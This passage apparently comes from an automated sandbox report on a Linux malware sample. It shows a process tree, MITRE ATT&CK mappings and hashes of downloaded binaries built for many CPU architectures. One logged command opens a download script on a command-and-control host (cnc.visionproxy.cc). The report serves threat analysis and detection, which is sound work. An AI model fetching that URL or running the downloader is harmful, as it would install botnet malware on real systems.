- - /usr/bin/which
    which /usr/bin/firefox
    3⤵
    PID:1610
- /usr/lib/firefox/firefox
  /usr/lib/firefox/firefox http://cnc.visionproxy.cc/wget.sh
  2⤵
  - Changes its process name
  - Checks CPU configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1609
- - /usr/bin/dbus-launch
    dbus-launch --autolaunch 11c67417355f45d397f6be11f62e85a6 --binary-syntax --close-stderr
    3⤵
    PID:1614
- - /usr/bin/lsb_release
    /usr/bin/lsb_release -idrc
    3⤵
    - System Information Discovery
    PID:1628
- - /usr/local/sbin/dbus-launch
    dbus-launch "--autolaunch=11c67417355f45d397f6be11f62e85a6" --binary-syntax --close-stderr
    3⤵
    PID:1638
- - /usr/local/bin/dbus-launch
    dbus-launch "--autolaunch=11c67417355f45d397f6be11f62e85a6" --binary-syntax --close-stderr
    3⤵
    PID:1638
- - /usr/sbin/dbus-launch
    dbus-launch "--autolaunch=11c67417355f45d397f6be11f62e85a6" --binary-syntax --close-stderr
    3⤵
    PID:1638
- - /usr/bin/dbus-launch
    dbus-launch "--autolaunch=11c67417355f45d397f6be11f62e85a6" --binary-syntax --close-stderr
    3⤵
    PID:1638
- - /usr/lib/firefox/firefox
    /usr/lib/firefox/firefox -contentproc -parentBuildID 20230522134052 -prefsLen 21460 -prefMapSize 234909 -appDir /usr/lib/firefox/browser "{440aea4d-4686-4094-9f21-4f2a3c5dd28e}" 1609 true socket
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:1696
- - /usr/lib/firefox/firefox
    /usr/lib/firefox/firefox -contentproc -childID 1 -isForBrowser -prefsLen 19592 -prefMapSize 234909 -jsInitLen 238780 -parentBuildID 20230522134052 -appDir /usr/lib/firefox/browser "{b3f6cc6a-8cae-4188-b66d-38fa4342333f}" 1609 true tab
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:1713
- - /usr/lib/firefox/firefox
    /usr/lib/firefox/firefox -contentproc -childID 2 -isForBrowser -prefsLen 25980 -prefMapSize 234909 -jsInitLen 238780 -parentBuildID 20230522134052 -appDir /usr/lib/firefox/browser "{2882afae-7eb2-4b13-93e4-9964e919f77f}" 1609 true tab
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:1752
- - /usr/lib/firefox/firefox
    /usr/lib/firefox/firefox -contentproc -childID 3 -isForBrowser -prefsLen 24040 -prefMapSize 234909 -jsInitLen 238780 -parentBuildID 20230522134052 -appDir /usr/lib/firefox/browser "{c38d8637-0601-4bb6-9ee7-bfa5b214d96a}" 1609 true tab
    3⤵
    - Reads CPU attributes
    PID:1782
- - /usr/lib/firefox/firefox
    /usr/lib/firefox/firefox -contentproc -childID 4 -isForBrowser -prefsLen 24040 -prefMapSize 234909 -jsInitLen 238780 -parentBuildID 20230522134052 -appDir /usr/lib/firefox/browser "{ab7a9513-5637-4f55-b44c-92f0b68c866c}" 1609 true tab
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:1786
- - /usr/lib/firefox/firefox
    /usr/lib/firefox/firefox -contentproc -childID 5 -isForBrowser -prefsLen 24040 -prefMapSize 234909 -jsInitLen 238780 -parentBuildID 20230522134052 -appDir /usr/lib/firefox/browser "{6d3cd3b9-89a3-48ed-ae85-e60a031c7781}" 1609 true tab
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:1789

/usr/lib/gvfs/gvfsd-fuse
/usr/lib/gvfs/gvfsd-fuse /root/.gvfs -f -o big_writes
1⤵
- Changes its process name
PID:1670

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/root/.cache/dconf/user

Filesize
2B

MD5
c4103f122d27677c9db144cae1394a66

SHA1
1489f923c4dca729178b3e3233458550d8dddf29

SHA256
96a296d224f285c67bee93c30f8a309157f0daa35dc5b87e410b78630a09cfc7

SHA512
5ea71dc6d0b4f57bf39aadd07c208c35f06cd2bac5fde210397f70de11d439c62ec1cdf3183758865fd387fcea0bada2f6c37a4a17851dd1d78fefe6f204ee54

Download Submit
/root/Downloads/C_U-HRtB.sh.part

Filesize
859B

MD5
58260d8f668b391f5d4d5fbb6d27ee56

SHA1
997811cdcdb8a97775d0b60c54cf7398f65aa595

SHA256
949c6db1cb6ed0e2a95d4f5730af742f3cb6d13c2845a30c9844d6d609dfb7d3

SHA512
bff4127d2c6e1c0eac08fe68283b6a9761c0cd04d38f81a937a8c31c801b616d011e6fd5054da13e3e20c24e6aff2bfd604be91612304441e203c3a6294cb3f7

Download Submit
/root/Downloads/arm

Filesize
3KB

MD5
dee8ca04ad4c3c4f113446e22ff81f2e

SHA1
355d0a1018111c73368637db654d00ecd0d1c53b

SHA256
c8791066787bafa8c71980f4a01726cdf194d9dedb0cf493e24bf574299eecd4

SHA512
a99d0c24143833440feba5ac566dbfc3623462ca203f39a117e4e3ded6a6b4bd19bbe1436d9daf6bd106c431dc6f424587adfbad58961143c7fff4a3a17e64a3

Download Submit
/root/Downloads/arm

Filesize
55KB

MD5
05cdf13a162d575b1f9331956c0ca032

SHA1
fe0ac83b81ed27993bde6b016f9293c161cdca16

SHA256
33cdcdd8c747628439ca93b019e5eb032b6f88c2687c6c050ee3471ed132a601

SHA512
d2cd9463bf7ebecbdb9cc3e8da6e6c38ecb8545569947bbfc80f457c582bef8a8cbc126bbfb865421eaeafa1510f87f0cc574c7a8af680a2383f026be2d5392c

Download Submit
/root/Downloads/arm5

Filesize
1KB

MD5
aaad5c7f24c2cd38236f97993d8c7d8a

SHA1
7190ee409c91e0ae3ccdcf455a06d04a06c3780e

SHA256
a431f6ccfcf7c18e2dcef93d9b46acfa5663fab57ed0d0b025231da78849d02b

SHA512
518eff2dc9ceafdb192fb77435126820d0c2b55359749f3f0aadffb9249175258389e394a1b7baa997e176d2f7156435becf766b822153496c34d41441ca1317

Download Submit
/root/Downloads/arm5

Filesize
22KB

MD5
bf27181bb797d36c5b981cb27bd92290

SHA1
79962c341feefe22a5507ae7f3b9e68df931e9b4

SHA256
870633af07a7799f8caa9faaf1c4a98e9c97dc00c2b529f6adf87d1d3ef1fdcc

SHA512
b598dcaa7c26859e5a2a2df951c166ad14a497dc3eb85327f60d6bcb07cbb98d57268f1303433c4975bcbd09ecb2b464e5f7345fa005dc69e8b0ff8d713f6eb6

Download Submit
/root/Downloads/arm6

Filesize
12KB

MD5
7f08d7d15d63534b73f9f1e015ccc6ef

SHA1
706b5da19059164b6331dc82705acd42fedf1f93

SHA256
9410cf44835f98a2ffa8847ac3eb3640257a1e3d4baddb0a0e97983bc2fd6a75

SHA512
16b12aff8edda213df87a821dd1de0dfb147d62ffbb0d65c21ec448664836ffadb833e2c804225df24658f13044e9feb96eec88b26131e207b399d011f8e09c0

Download Submit
/root/Downloads/arm6

Filesize
59KB

MD5
3c2327b07c0b0cb3a8176d806892c145

SHA1
3e45f15bc1c6d99cc99444b702590c5b196dadb6

SHA256
f16128030a58123fc3d2e57329d530414e1b015175274a24327de202b6f8765f

SHA512
b556eb2229fbd08e86d60eb1b50ab1b2175d2136a6dca46b05b0cc1e76d1e2ebeac2a46e3baebe62ba8dda9cf6c0f2406b31039e53dd6cbd4161f5169c4e6e74

Download Submit
/root/Downloads/arm7

Filesize
12KB

MD5
1c24129f718ae3c7cedf741bc1584ed2

SHA1
e3bdcf515dc0dcb146cb6f01c0e6ad887dae84be

SHA256
d09949fb24d45fdeb8d49c3157401b5acdfacd992593509a0ba9570f2911ec98

SHA512
2f5a495ad8b46f5af3e5521b419d036809cb5426f1b132bfb3e98ef9a8374891be624a24000d604145244a096dd413ff46af18ba0ad91d33857f621fe04fc26c

Download Submit
/root/Downloads/arm7

Filesize
61KB

MD5
fac7c017dd44dbb8c1efba6658393c26

SHA1
443966a6adc808034b14120b3f3cb14baedf7154

SHA256
d135225eb70e603fc2eac6c82b936a6b73400ef04bbc4522035026df376b193f

SHA512
2d81fb45af5bdffb502f7d6837f8046155e13a619154d8742b173332efac0d3ddcdcfbdb1b9f84ed516cc645641f571abd22aa165b1b7403f0d4b0111d4ddbf8

Download Submit
/root/Downloads/m68k

Filesize
3KB

MD5
ed103d7030f2d3e6a1c7eeda9e0f6be6

SHA1
69370759b504f4951f8179d68348a5b3303ffbac

SHA256
66263a07eaf21e8ac6a0843bde281eb4f0652d589f45f001486dcd23b26e4756

SHA512
7a3b6ed26ef8de0ba0c6500af14e26559b693bc8affa59d0354987ea74e539ca10cbf8a926cfd1bd70e435c1a41da43ab472436188c2c38e8db3f5a6345854d0

Download Submit
/root/Downloads/m68k

Filesize
163KB

MD5
f08d85ae5d7ed21cc83fdb2d19bce570

SHA1
9dbf24ba2acce146306d0fae95b94aeff4664500

SHA256
b2687721a39891dbcb31d863bfce9c16888932615344e0aa6e3d70600f3fe8a4

SHA512
990bd2f0b7353df2c3ec58bcc73210da14834a5f0b9aa6b72f2c525cf9613f085110754b4393a8710a38cf66898d079bbff26abb46e96c8078c33301ac08e0eb

Download Submit
/root/Downloads/mips

Filesize
12KB

MD5
4229c33d2f79a8eaeba4bd5b7e2c2dd0

SHA1
136f0922dbd9c00c88e9390ec4bc650e6a72fafa

SHA256
0abc10b6b45b922886e1949afc5307dd9d09c06ba76df9c3954430981f6afaf4

SHA512
2a23e73dd11712b22b8f8a144307be9a248eaadb399924ef525002f8fa36ec813af8c737474d7f41aef63aad8889252449d42a90d260a71cffa750d032d45cf6

Download Submit
/root/Downloads/mips

Filesize
59KB

MD5
c385fa71adbf8a2078c9b2d3286b7945

SHA1
8a2bbab07f4b955910517a61e64d327d4142097a

SHA256
4263e3cbbb06ce18c7020c66f3565606e0d2fab6d294967f7e4ed9ee3eff57e1

SHA512
16dec13bb4ee226cb2231df362c2d0a75ca97292129808926fea933263226f338b9d4102e2d57eb6af4936e195fc548dbfe939bef4a7c145cf12e20083b76d8a

Download Submit
/root/Downloads/mpsl

Filesize
1KB

MD5
27ad213d96937535f113c8f8b582b857

SHA1
395df88233c59062593a6e570083f92dc04291d1

SHA256
9954f5d339838281661d059135c93b120f9dcc08033945dbc4419ebbeda5a961

SHA512
34f3accbc64f00dbe422bbd7b57488a77c377f68bceb2cc56f7cab5038ad7e2068b8517f3ac7e25f44ae8edf19c51360cc213b67171b92b18c4b01fdc2de8068

Download Submit
/root/Downloads/mpsl

Filesize
61KB

MD5
865a2174cd362e1f2b2386a5beb0738c

SHA1
944a3f0a1c4b767919eceb43661cfec53e266f06

SHA256
9d2470f278b3fd3f5748b191c36530f92440e71dc029e97aef7717f063947704

SHA512
5e1dcac8394ff3a7d5d13a9d7e5d43f99100b9fd26bab935971b05205e2b96afcd5732d967218fa15e1a9b629a548eb2114f912c53e4ebcfb2b57662f3b04f51

Download Submit
/root/Downloads/ppc

Filesize
1KB

MD5
9549b15ce23d4000ad086d04c3b2b1d4

SHA1
5b5c7740123d670972fd60a218b00efb2da26e18

SHA256
285d2756f3a13e1128db79bba1e43b42671b6e2f1e4bb5c96a31b30869c8d176

SHA512
65ad815d159c00307d3af4cd7783d7d0aab2c76c913a8d81b4ef3f16204fbbf9253b5f13c5eb9ca87008aaa1026700ad39f84fc5a66f67ed80bab7a293ae5934

Download Submit
/root/Downloads/ppc

Filesize
54KB

MD5
66425a2f6a2bd24416c0462d28f0aa2e

SHA1
579e211f6c898c75c44229cddaa7a37f9e9283e9

SHA256
ccbf302470b15d01c761877d109e9c25d0c6bad96cc4498b8d5fc1f8572e69d5

SHA512
199d34e83898cf1d1781fef0935e3af8652b9d768159e671c1db5884860c894800803fd2ebd612d25c862e72d4942decfa2099ac0d6722bb18ea5a5b9bf9f9d1

Download Submit
/root/Downloads/sh4

Filesize
3KB

MD5
95c31bce41f0fc41d079b4ebc89c29ae

SHA1
0f2ac993523403dc5ec8c2c70ddbc9de13c636c3

SHA256
996632c9af8b4dd863196b77677054725dbb1e65462165646ec38fb2312b4cd9

SHA512
a4cc06a4b92c7494a1b587350decf6246ad019f5e2f071a6b65f1d2e646899784c1192ebffdebb2ab1632f34756516b69ccb2a499e0fa4c2de02d8ac0301e5af

Download Submit
/root/Downloads/sh4

Filesize
128KB

MD5
19b061c750e329b9a64af04f4f551374

SHA1
b580e646101b4ecc59d2c32a6abd3fcfdfb55093

SHA256
ff5e93ab91c246bdb6a6c2a7a38316a94e140212cd1a259ceb116d6d4d944933

SHA512
e9bbb9e2551643f2ea6b699ed1e5efed954be876cf656feae279f1f6fd214e97d810506f2fdfe746e3b734049dd49ab734b405e994a4225e0a53e6aae0d2b363

Download Submit
/root/Downloads/spc

Filesize
12KB

MD5
61b1d1f4b168356b1212caa7d14aa3d1

SHA1
f4d6ebbc1d7d28c56160e967a7a2592e0b3e4d8c

SHA256
497d4fb308df94da96854a26aa4a6c969c673b8445e3e0df2cac1fb11b0a0e27

SHA512
f91a4d519db5e8fe7ee47c11b33ab09a4ea4e238fffb139a231932575a7ff390c87a1d2d1d4436d3606b422954ba8b8b04971a2ee0d9171a8956ad398cdb6dc4

Download Submit
/root/Downloads/spc

Filesize
46KB

MD5
db8be97d9a6afa65664a1eddbab1384a

SHA1
5edacf4eca9e30da5c2cff98dd709611c3201063

SHA256
f5918de81fc5904603e38219f3d003f603ad6f3de5253c948b4af072c10f61b0

SHA512
ad819258b5738b65f4d901e9727440b687202c511b3fa06268eab00ab8b003e43501a9164fa610a7917b36ee22088c89e1c176a808fdb58a019fcb58bf35f00b

Download Submit
/root/Downloads/x86

Filesize
1KB

MD5
fe3ec722abc8697eee4d28bb2e2cff0f

SHA1
6f5d56c404569cb25688c127f057e02d0147a66e

SHA256
db105151cc782d0b182105913ddc9f72891537f0560151264b82a68cf5ffcfb6

SHA512
340e4d6d43c6c2fd23922198c55cbfa68d9c8071ec3ec99db25a0f4e03157bdf1673e5ef399ac3bee056826bfcb569089a24f627aca26b6e941fe8fc4aacc898

Download Submit
/root/Downloads/x86

Filesize
44KB

MD5
9c79eea62f0a8585232ab3a2a7f00c9c

SHA1
17dedf8f8fcd6d87e96d0539b817c3183d73f971

SHA256
68ab93839a60050388597df18f10834dfe8757a534960ed2ec40e57006acd555

SHA512
08be510b37ff18f57e0433b26edd6a5cf74b22a57bfeaeda95acc83015a3fadd3dbb05e14993931ff3de9be8743b7e1b529c11e563e9ef2c664a2c3f72998ce7

Download Submit
/tmp/tmpaddon

Filesize
12KB

MD5
7daae609c23338d7a4ce1e540261e3e1

SHA1
4ca4f2c0ea54d1ad23fa559d8637ca9c0bd3d320

SHA256
b7d8bfe084b451a9b81660abdcef732fc9d1e96236142525d731f03d15f6a238

SHA512
32fd8b81ea5932227d8e017905238f52c82730d6c13e40511f7448d5f11c54a0af55caa615c771cffc7e83d6b5dd4e606e797c4fd49a691c6cb9c6152a70ae4a

Download Submit
/tmp/tmpaddon-1

Filesize
499KB

MD5
152eda253e242e18443ef3282495bc7c

SHA1
ff0fa85565f21ec4931baad4573b4c0bd08c4019

SHA256
8e03090fee16f6e0ee2e436af8e51d0c3deed6d9f0db80dec048e668fc009a48

SHA512
94531e267314de661b2205c606283fb066d781e5c11027578f2a3c3aa353437c2289544074a28101b6b6f0179f0fe6bd890a0ae2bb6e1cf9053650472576366c

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads